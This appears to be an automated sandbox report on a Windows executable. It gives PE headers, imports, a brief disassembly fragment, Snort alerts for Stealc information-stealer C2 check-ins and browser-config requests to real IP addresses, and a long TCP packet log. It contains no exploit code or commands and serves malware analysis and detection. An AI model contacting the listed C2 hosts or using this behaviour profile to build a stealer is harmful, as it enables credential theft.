xor ecx, ecx
mov ch, byte ptr [esp+00000148h]
movzx ecx, cx
shl eax, 10h
or eax, ecx
movzx ecx, byte ptr [esp+0000004Eh]

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8608	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x45000	0xa60	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2a8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x68d8	0x6a00	742185983fa6320c910f81782213e56f	False	0.6695165094339622	data	6.478461709868021	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1464	0x1600	a995b118b38426885fc6ccaa984c8b7a	False	0.4314630681818182	data	4.969091535632612	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x2a818	0x600	9a9bf385a30f1656fc362172b16d9268	False	0.5247395833333334	data	4.172601271908501	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x35000	0x10000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x45000	0xa60	0xc00	ab05031282d8b9e3df8bfa33b3082562	False	0.4033203125	data	4.200347469292657	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x45190	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	English	United States	0.42473118279569894
RT_DIALOG	0x45478	0x100	data	English	United States	0.5234375
RT_DIALOG	0x45578	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x45698	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x456f8	0x14	data	English	United States	1.2
RT_MANIFEST	0x45710	0x349	XML 1.0 document, ASCII text, with very long lines (841), with no line terminators	English	United States	0.5517241379310345

Imports

DLL	Import
ADVAPI32.dll	RegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
SHELL32.dll	SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
ole32.dll	CoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
COMCTL32.dll	ImageList_Destroy, ImageList_AddMasked, ImageList_Create
USER32.dll	MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
GDI32.dll	GetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
KERNEL32.dll	lstrcmpiA, CreateFileW, GetTempFileNameW, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, WriteFile, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/26/24-17:11:12.318020	TCP	2051828	ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1	80	49714	185.172.128.76	192.168.2.5
04/26/24-17:11:11.271187	TCP	2044243	ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in	49714	80	192.168.2.5	185.172.128.76
04/26/24-17:11:11.968319	TCP	2044244	ET TROJAN Win32/Stealc Requesting browsers Config from C2	49714	80	192.168.2.5	185.172.128.76
04/26/24-17:11:01.922119	TCP	2856233	ETPRO TROJAN Win32/Unknown Loader Related Activity (GET)	49709	80	192.168.2.5	185.172.128.90

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 26, 2024 17:10:50.430681944 CEST	49675	443	192.168.2.5	23.1.237.91
Apr 26, 2024 17:10:50.430696964 CEST	49674	443	192.168.2.5	23.1.237.91
Apr 26, 2024 17:10:50.586992025 CEST	49673	443	192.168.2.5	23.1.237.91
Apr 26, 2024 17:10:53.305278063 CEST	49705	443	192.168.2.5	108.157.172.96
Apr 26, 2024 17:10:53.305367947 CEST	443	49705	108.157.172.96	192.168.2.5
Apr 26, 2024 17:10:53.305485010 CEST	49705	443	192.168.2.5	108.157.172.96
Apr 26, 2024 17:10:53.318193913 CEST	49705	443	192.168.2.5	108.157.172.96
Apr 26, 2024 17:10:53.318234921 CEST	443	49705	108.157.172.96	192.168.2.5
Apr 26, 2024 17:10:53.594461918 CEST	443	49705	108.157.172.96	192.168.2.5
Apr 26, 2024 17:10:53.594558954 CEST	49705	443	192.168.2.5	108.157.172.96
Apr 26, 2024 17:10:53.653373003 CEST	49705	443	192.168.2.5	108.157.172.96
Apr 26, 2024 17:10:53.653413057 CEST	443	49705	108.157.172.96	192.168.2.5
Apr 26, 2024 17:10:53.654501915 CEST	443	49705	108.157.172.96	192.168.2.5
Apr 26, 2024 17:10:53.654575109 CEST	49705	443	192.168.2.5	108.157.172.96
Apr 26, 2024 17:10:53.657243013 CEST	49705	443	192.168.2.5	108.157.172.96
Apr 26, 2024 17:10:53.704147100 CEST	443	49705	108.157.172.96	192.168.2.5
Apr 26, 2024 17:10:53.887448072 CEST	443	49705	108.157.172.96	192.168.2.5
Apr 26, 2024 17:10:53.887589931 CEST	49705	443	192.168.2.5	108.157.172.96
Apr 26, 2024 17:10:53.887603998 CEST	443	49705	108.157.172.96	192.168.2.5
Apr 26, 2024 17:10:53.887659073 CEST	49705	443	192.168.2.5	108.157.172.96
Apr 26, 2024 17:10:53.887676954 CEST	443	49705	108.157.172.96	192.168.2.5
Apr 26, 2024 17:10:53.887733936 CEST	49705	443	192.168.2.5	108.157.172.96
Apr 26, 2024 17:10:53.887742996 CEST	443	49705	108.157.172.96	192.168.2.5
Apr 26, 2024 17:10:53.887784004 CEST	49705	443	192.168.2.5	108.157.172.96
Apr 26, 2024 17:10:53.887840986 CEST	443	49705	108.157.172.96	192.168.2.5
Apr 26, 2024 17:10:53.887892008 CEST	49705	443	192.168.2.5	108.157.172.96
Apr 26, 2024 17:10:53.895098925 CEST	49705	443	192.168.2.5	108.157.172.96
Apr 26, 2024 17:10:53.895123959 CEST	443	49705	108.157.172.96	192.168.2.5
Apr 26, 2024 17:10:57.240631104 CEST	49706	443	192.168.2.5	108.157.172.96
Apr 26, 2024 17:10:57.240668058 CEST	443	49706	108.157.172.96	192.168.2.5
Apr 26, 2024 17:10:57.240742922 CEST	49706	443	192.168.2.5	108.157.172.96
Apr 26, 2024 17:10:57.265450954 CEST	49706	443	192.168.2.5	108.157.172.96
Apr 26, 2024 17:10:57.265494108 CEST	443	49706	108.157.172.96	192.168.2.5
Apr 26, 2024 17:10:57.531073093 CEST	443	49706	108.157.172.96	192.168.2.5
Apr 26, 2024 17:10:57.531181097 CEST	49706	443	192.168.2.5	108.157.172.96
Apr 26, 2024 17:10:57.533335924 CEST	49706	443	192.168.2.5	108.157.172.96
Apr 26, 2024 17:10:57.533345938 CEST	443	49706	108.157.172.96	192.168.2.5
Apr 26, 2024 17:10:57.533768892 CEST	443	49706	108.157.172.96	192.168.2.5
Apr 26, 2024 17:10:57.542612076 CEST	49706	443	192.168.2.5	108.157.172.96
Apr 26, 2024 17:10:57.588113070 CEST	443	49706	108.157.172.96	192.168.2.5
Apr 26, 2024 17:10:57.842868090 CEST	443	49706	108.157.172.96	192.168.2.5
Apr 26, 2024 17:10:57.842966080 CEST	443	49706	108.157.172.96	192.168.2.5
Apr 26, 2024 17:10:57.843020916 CEST	49706	443	192.168.2.5	108.157.172.96
Apr 26, 2024 17:10:57.846151114 CEST	49706	443	192.168.2.5	108.157.172.96
Apr 26, 2024 17:10:58.584480047 CEST	49707	443	192.168.2.5	108.157.172.96
Apr 26, 2024 17:10:58.584564924 CEST	443	49707	108.157.172.96	192.168.2.5
Apr 26, 2024 17:10:58.585361958 CEST	49707	443	192.168.2.5	108.157.172.96
Apr 26, 2024 17:10:58.588391066 CEST	49707	443	192.168.2.5	108.157.172.96
Apr 26, 2024 17:10:58.588434935 CEST	443	49707	108.157.172.96	192.168.2.5
Apr 26, 2024 17:10:58.853435993 CEST	443	49707	108.157.172.96	192.168.2.5
Apr 26, 2024 17:10:58.853545904 CEST	49707	443	192.168.2.5	108.157.172.96
Apr 26, 2024 17:10:58.855072975 CEST	49707	443	192.168.2.5	108.157.172.96
Apr 26, 2024 17:10:58.855102062 CEST	443	49707	108.157.172.96	192.168.2.5
Apr 26, 2024 17:10:58.855477095 CEST	443	49707	108.157.172.96	192.168.2.5
Apr 26, 2024 17:10:58.862747908 CEST	49707	443	192.168.2.5	108.157.172.96
Apr 26, 2024 17:10:58.904160976 CEST	443	49707	108.157.172.96	192.168.2.5
Apr 26, 2024 17:10:59.173461914 CEST	443	49707	108.157.172.96	192.168.2.5
Apr 26, 2024 17:10:59.173656940 CEST	443	49707	108.157.172.96	192.168.2.5
Apr 26, 2024 17:10:59.173743010 CEST	49707	443	192.168.2.5	108.157.172.96
Apr 26, 2024 17:10:59.176214933 CEST	49707	443	192.168.2.5	108.157.172.96
Apr 26, 2024 17:10:59.184674978 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:10:59.425573111 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:10:59.430881977 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:10:59.563261986 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:10:59.804075956 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:10:59.804166079 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:10:59.804207087 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:10:59.804250956 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:10:59.804284096 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:10:59.804291010 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:10:59.804336071 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:10:59.804419041 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:10:59.804440022 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:10:59.804480076 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:10:59.804497957 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:10:59.804519892 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:10:59.804558992 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:10:59.804621935 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:10:59.805694103 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:10:59.805763960 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:00.040040970 CEST	49674	443	192.168.2.5	23.1.237.91
Apr 26, 2024 17:11:00.040040970 CEST	49675	443	192.168.2.5	23.1.237.91
Apr 26, 2024 17:11:00.045553923 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.045608044 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.045645952 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.045682907 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.045687914 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:00.045737982 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.045779943 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.045783997 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:00.045818090 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.045833111 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:00.045857906 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.045897007 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.045938015 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.045957088 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:00.045980930 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:00.045994043 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.046032906 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.046072960 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.046093941 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:00.046112061 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.046149015 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.046156883 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:00.046189070 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.046230078 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.046252012 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:00.046267986 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.046305895 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.046336889 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:00.046345949 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.046411991 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:00.196305037 CEST	49673	443	192.168.2.5	23.1.237.91
Apr 26, 2024 17:11:00.287822008 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.287873983 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.287930012 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.287957907 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:00.287983894 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.288022041 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.288052082 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:00.288060904 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.288117886 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.288131952 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:00.288158894 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.288197994 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.288234949 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.288235903 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:00.288276911 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.288300991 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:00.288316011 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.288352966 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.288388014 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.288429022 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.288439989 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:00.288439989 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:00.288470030 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.288506031 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.288513899 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:00.288546085 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.288583994 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.288623095 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.288661957 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:00.288662910 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.288687944 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:00.288703918 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.288764000 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:00.288764000 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.288811922 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.288847923 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.288886070 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.288903952 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:00.288925886 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.288938046 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:00.288965940 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.289005995 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.289043903 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.289076090 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:00.289082050 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.289120913 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.289127111 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:00.289161921 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.289172888 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:00.289201021 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.289238930 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.289258957 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:00.289278984 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.289318085 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.289343119 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:00.289356947 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.289392948 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.289405107 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:00.289434910 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.289479017 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:00.529858112 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.529921055 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.529961109 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.529999018 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.530045033 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.530055046 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:00.530055046 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:00.530082941 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.530122995 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.530184984 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:00.530184984 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.530231953 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.530261993 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:00.530272007 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.530309916 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.530338049 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:00.530349970 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.530389071 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.530426979 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.530436039 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:00.530469894 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.530502081 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:00.530509949 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.530546904 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.530565977 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:00.530585051 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.530626059 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.530663013 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.530678034 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:00.530704021 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.530731916 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:00.530745029 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.530802965 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.530829906 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:00.530844927 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.530881882 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.530916929 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:00.530920029 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.530961990 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.531007051 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.531009912 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:00.531048059 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.531054020 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:00.531085014 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.531122923 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.531141043 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:00.531158924 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.531197071 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.531218052 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:00.531235933 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.531275988 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.531311989 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.531341076 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:00.531349897 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.531388998 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.531428099 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.531429052 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:00.531429052 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:00.531467915 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.531507969 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.531529903 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:00.531548023 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.531584024 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.531616926 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:00.531624079 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.531663895 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.531704903 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.531708002 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:00.531740904 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.531778097 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.531789064 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:00.531816959 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.531850100 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:00.531857014 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.531897068 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.531934977 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.531971931 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:00.531972885 CEST	80	49708	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:00.532000065 CEST	49708	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:00.532012939 CEST	80	49708	185.172.128.59	192.168.2.5
